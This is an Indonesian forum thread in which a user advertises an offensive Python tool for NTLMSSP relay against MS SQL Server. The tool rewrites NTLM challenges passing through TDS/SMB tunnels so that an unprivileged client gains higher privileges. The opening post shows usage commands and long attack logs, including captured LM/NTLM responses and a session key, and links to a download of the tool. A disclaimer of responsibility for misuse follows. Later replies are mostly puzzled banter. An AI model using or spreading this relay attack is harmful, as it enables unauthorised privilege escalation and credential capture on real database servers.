1. Halo Guest, pastikan Anda selalu menaati peraturan forum sebelum mengirimkan post atau thread baru.

NADIA VEGA - NTLMSSP(MS SQL server remote privilege)By Shadow Angel

Discussion in 'Pemrograman Web' started by shadow angel, Jul 19, 2008.

Thread Status:
Not open for further replies.
  1. shadow angel

    shadow angel Newbie

    Joined:
    Jul 19, 2008
    Messages:
    3
    Likes Received:
    0
    NADIA VEGA - NTLMSSP

    [​IMG]
    Salam .. Penjelasan singkat,..:

    Tool tunel TDS/SQL ini - untuk hubungan ke target sql server
    Dengan status non privileged user. Tunel - merubah sebuah
    paket ntlmssp yang terdapat di hubungan TDS/SQL,
    terdokumentasi dengan MITM.

    ~ test dengan :

    Windows 2000 SP4 + Phyton + SQL Server 2000

    ========================================

    $$$ Tes SQL Client :

    >Nadia.py w2ks-sql2000
    [.] Koneksi ke Server w2ks-sql2000...
    [!] Menghubungkan ke server w2ks-sql2000 OK
    Traceback (most recent call last):
    File "C:\tmp\Nadia.py", line 31, in ?
    cursor.execute("create table katakuris (line varchar(42))")
    dbi.program-error: [Microsoft][ODBC SQL Server Driver][SQL Server]CREATE TABLE permission denied in database 'master'. in EXEC

    aduh.., izin PERMISSION DENIED



    >Nadia.py w2ks-sql2000-tunel
    [.] Koneksi ke Server w2ks-sql2000-tunel...
    [!] Menghubungkan ke server w2ks-sql2000-tunel OK
    Traceback (most recent call last):
    File "C:\tmp\Nadia.py", line 48, in ?
    print cursor.execute("create table katakuris (line varchar(42))")
    dbi.program-error: [Microsoft][ODBC SQL Server Driver][SQL Server]There is already an object named 'katakuris' in the database. in EXEC

    \o/ Pesan : Sekarang udah jalan!
    ========================================

    $$$ Contoh
    ### NADIA VEGA - NTLMSSP ###
    ### MS SQL server remote privilege ###
    ### Shadow Angel 2007 ###

    [---] Menunggu koneksi SQL Client

    [***] Mendapatkan SQL Client

    [***] mendapatkan respon balik dari Server

    [---] respon balik SQL server SMB client dengan respon balik dari
    SQL server

    [-] mendapatkan koneksiSMB dari SQl Server (DSN=w2ks-sql2000)

    [***] mendapatkan respon SQL server SMB client

    [***] autentikasi ke SQL server sebagai A d m i n i s t r a t o r

    [---] kirim respon ke SQL server

    [---] Mentunnel client...

    ========================================

    $$$ Contoh :

    >vega.py 192.168.60.131



    ### NADIA VEGA - NTLMSSP ###
    ### MS SQL server remote privilege ###
    ### Shadow Angel 2007 ###

    Penggunaan: vega.py tunel_local_ip sql_server_ip sql_server

    >vega.py 192.168.60.1 192.168.60.131 w2ks-sql2000


    ### NADIA VEGA - NTLMSSP ###
    ### MS SQL server remote privilege ###
    ### Shadow Angel 2007 ###

    [---] menunggu koneksi dari SQL Client
    [-] Buat Baru, TDS client 127.0.0.1
    [-] menghubungkan ke remote SQL server 192.168.60.131

    [***] mendapatkan SQL client

    ========================================
    [1->] SQL client -> TDS tunel
    [2->] SQL client -> TDS tunel -> SQL server

    ========================================
    [3<-] TDS tunel <- SQL server
    [4<-] SQL client <- TDS tunel <- SQL server

    ========================================
    [1->] SQL client -> TDS tunel
    [2->] SQL client -> TDS tunel -> SQL server

    ========================================
    [3<-] TDS tunel <- SQL server
    !! NTLMSSP: Mendapatkan Respon Balik !!
    ----------------------------------------
    [Respon Balik - 8 bytes]
    0b 62 83 ca a8 36 71 f4
    ----------------------------------------
    [4<-] SQL client <- TDS tunel <- SQL server

    [***] mendapatkan respon balik dari SQL Server
    [---] respon balik SQL Server SMB Client dengan respon balik
    SQl Server
    [-] SMBTuna, menunggu SQL server untuk koneksi ke SMB tunnel...
    [-] Mendapatkan koneksi SMB dari SQL server (DSN=w2ks-sql2000)
    [-] SMBTuna, SQL server 192.168.60.131 menghubungkan ke SMB
    [-] SMBTuna, menghubungkan ke remote SMB server 192.168.60.131

    ========================================
    [a->] SMB client -> SMB tunel
    [b->] SMB client -> SMB tunel -> SMB server

    ========================================
    [c<-] SMB tunel <- SMB server
    [d<-] SMB client <- SMB tunel <- SMB server

    ========================================
    [a->] SMB client -> SMB tunel
    !! NTLMSSP: Mulai Bernegosiasi !!
    [b->] SMB client -> SMB tunel -> SMB server

    ========================================
    [c<-] SMB tunel <- SMB server
    !! NTLMSSP: Mendapatkan Respon Balik !!
    ----------------------------------------
    [respon balik - 8 bytes]
    2f 31 e1 ca 9d ab 88 db
    ----------------------------------------
    ----------------------------------------
    [respon balik SMB server - 8 bytes]
    2f 31 e1 ca 9d ab 88 db
    ----------------------------------------
    [-] SMBTuna, modifikasi respon balik SQL server :
    ----------------------------------------
    [respon balik SQL server - 8 bytes]
    0b 62 83 ca a8 36 71 f4
    ----------------------------------------
    [d<-] SMB client <- SMB tunel <- SMB server

    ========================================
    [a->] SMB client -> SMB tunel
    !! NTLMSSP: Mendapatkan autentikasi !!
    [b->] SMB client -> SMB tunel -> SMB server

    ========================================
    [c<-] SMB tunel <- SMB server
    [d<-] SMB client <- SMB tunel <- SMB server

    ========================================
    [a->] SMB client -> SMB tunel
    [b->] SMB client -> SMB tunel -> SMB server

    ========================================
    [c<-] SMB tunel <- SMB server
    [d<-] SMB client <- SMB tunel <- SMB server

    ========================================
    [a->] SMB client -> SMB tunel
    !! NTLMSSP: Mulai Bernegosiasi !!
    [b->] SMB client -> SMB tunel -> SMB server

    ========================================
    [c<-] SMB tunel <- SMB server
    !! NTLMSSP: Mendapatkan Respon Balik !!
    ----------------------------------------
    [respon balik - 8 bytes]
    f0 7b 2e bb 18 e0 f9 82
    ----------------------------------------
    ----------------------------------------
    [respon balik SMB server - 8 bytes]
    f0 7b 2e bb 18 e0 f9 82
    ----------------------------------------
    [-] SMBTuna, modifikasi respon balik SQL Server !!
    ----------------------------------------
    [respon balik SQL server - 8 bytes]
    0b 62 83 ca a8 36 71 f4
    ----------------------------------------
    [d<-] SMB client <- SMB tunel <- SMB server

    ========================================
    [a->] SMB client -> SMB tunel
    !! NTLMSSP: Mendapatkan Autentikasi !!
    [-] SMBTuna, mendapatkan respon balik
    ----------------------------------------------------------------------------

    ** NTLMSSP:type=3
    ----------------------------------------
    [lmresponse - 24 bytes]
    2a fe 49 f5 e7 09 92 4d 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00
    ----------------------------------------
    ----------------------------------------
    [ntlmresponse - 24 bytes]
    05 e3 ce 38 88 45 c5 bb 44 6b c4 b9 ee d8 b3 06 f9 5b c1 0d
    21 43 bd 14
    ----------------------------------------
    - domain W 2 K S E R V E R
    - user n a d i a v e g a
    - host W 2 K S E R V E R
    ----------------------------------------
    [sessionKey - 16 bytes]
    11 76 b7 fc 56 11 bd bd 9f 95 a2 25 fb 9c f1 ca
    ----------------------------------------
    ----------------------------------------------------------------------------

    [***] mendapatkan respon server SMB client

    [***] autentikasi ke SQL server sebagai nadia vega

    [---] kirim respon ke SQL server

    ========================================
    [1->] SQL client -> TDS tunel
    [-] client TDS paquet: type 17 status 1 size 142/8e
    !! NTLMSSP: Mendapatkan Autentikasi !!
    [-] Baris data NTLMSSP adalah 134
    [-] Baris NTLMSSP yang baru adalah 249
    [-] Ganti kapasitas TDS ke 257/0x101
    [-] Baris Data asli -> 142
    [-] Perbaharui baris data -> 257
    [2->] SQL client -> TDS tunel -> SQL server

    ========================================
    [3<-] TDS tunel <- SQL server
    [4<-] SQL client <- TDS tunel <- SQL server

    [---] tunnel client...

    [-] TDSTuna, permintaan master tunnel...

    ========================================
    [1->] SQL client -> TDS tunel
    [2->] SQL client -> TDS tunel -> SQL server

    ========================================
    [3<-] TDS tunel <- SQL server
    [4<-] SQL client <- TDS tunel <- SQL server

    ========================================
    [1->] SQL client -> TDS tunel
    [2->] SQL client -> TDS tunel -> SQL server

    Untuk mendonwload silahkan download di alamat di bawah ini :

    http://www.savefile.com/files/1676038

    Akhir kata semoga Program Python : NADIA VEGA – NTLMSSP, ini..
    Bermanfaat demi kemajuan dunia pemrograman..

    Shadow Angel tidak bertanggung jawab,
    Jika seandainya.. program ini digunakan untuk hal negatif..

    Untuk komentar atau saran bisa kirim ke email di :

    h4ck3r_shadowangel@yahoo.com

    Terima kasih..

    Salam Persahabatan..


    Shadow Angel
     
    shadow angel, Jul 19, 2008
    #1
  2. brainet

    brainet Super Hero

    Joined:
    Feb 4, 2006
    Messages:
    1,110
    Likes Received:
    17
    apaan ini? :confused:
     
    brainet, Jul 20, 2008
    #2
  3. ngkong

    ngkong Administrator Staff Member Banned Permanent

    Joined:
    Dec 5, 2005
    Messages:
    2,963
    Likes Received:
    301
    weleh opo iki...
    tak pindah ke forum programming ya bos...
     
    ngkong, Jul 20, 2008
    #3
  4. sudarsono

    sudarsono Ads.id Pro

    Joined:
    Jul 30, 2007
    Messages:
    439
    Likes Received:
    2
    Location:
    Pekanbaru
    Nadia Vega???
    wah kaya' nama artis ni...

    walah ora ngerti babar blas....:)
    otak ra sanggup..
     
    sudarsono, Jul 20, 2008
    #4
  5. Bonie

    Bonie Super Hero

    Joined:
    Apr 20, 2008
    Messages:
    1,105
    Likes Received:
    23
    Location:
    BonieBarlian.com
    server nya pake windows, fiuh... mana tahan... ada yg linux (php or mysql) gak tunnelnya? hehe
     
    Bonie, Jul 21, 2008
    #5
  6. badboys

    badboys Super Hero

    Joined:
    Aug 8, 2007
    Messages:
    1,420
    Likes Received:
    50
    Location:
    Di dalem kamar

    Mudeng ya bos yang dimaksud ama TS ?? apaan sih tuh:hmm:

    Kok kayaknya bukan makanan:lol:
     
    badboys, Sep 3, 2008
    #6
  7. raedyfor

    raedyfor Super Hero

    Joined:
    Feb 3, 2008
    Messages:
    2,061
    Likes Received:
    91
    saya mudeng nya cuman nadia vega nya aja :lol:
     
    raedyfor, Sep 3, 2008
    #7
  8. Bonie

    Bonie Super Hero

    Joined:
    Apr 20, 2008
    Messages:
    1,105
    Likes Received:
    23
    Location:
    BonieBarlian.com
    kan sesuai dgn judul thread atuh :D

    "NADIA VEGA - NTLMSSP(MS SQL server remote privilege)"
     
    Bonie, Sep 3, 2008
    #8
  9. danzig138

    danzig138 Ads.id Fan

    Joined:
    Nov 5, 2007
    Messages:
    106
    Likes Received:
    1
    naon yeuh bon?
    heking meureun
     
    danzig138, Sep 5, 2008
    #9
  10. Bonie

    Bonie Super Hero

    Joined:
    Apr 20, 2008
    Messages:
    1,105
    Likes Received:
    23
    Location:
    BonieBarlian.com
    jelas kan ? :D self risk aja deh pokoknya, jgn iseng2in punya bangsa sendiri aja... kasihan :(
     
    Bonie, Sep 5, 2008
    #10
  11. pLeNd

    pLeNd Ads.id Pro

    Joined:
    Jun 7, 2008
    Messages:
    332
    Likes Received:
    27
    wah hacker dah masuk forum ini ngeri ngeri :gembira:

    gue kabur aja dah... :hmm:
     
    pLeNd, Sep 7, 2008
    #11
Thread Status:
Not open for further replies.

Share This Page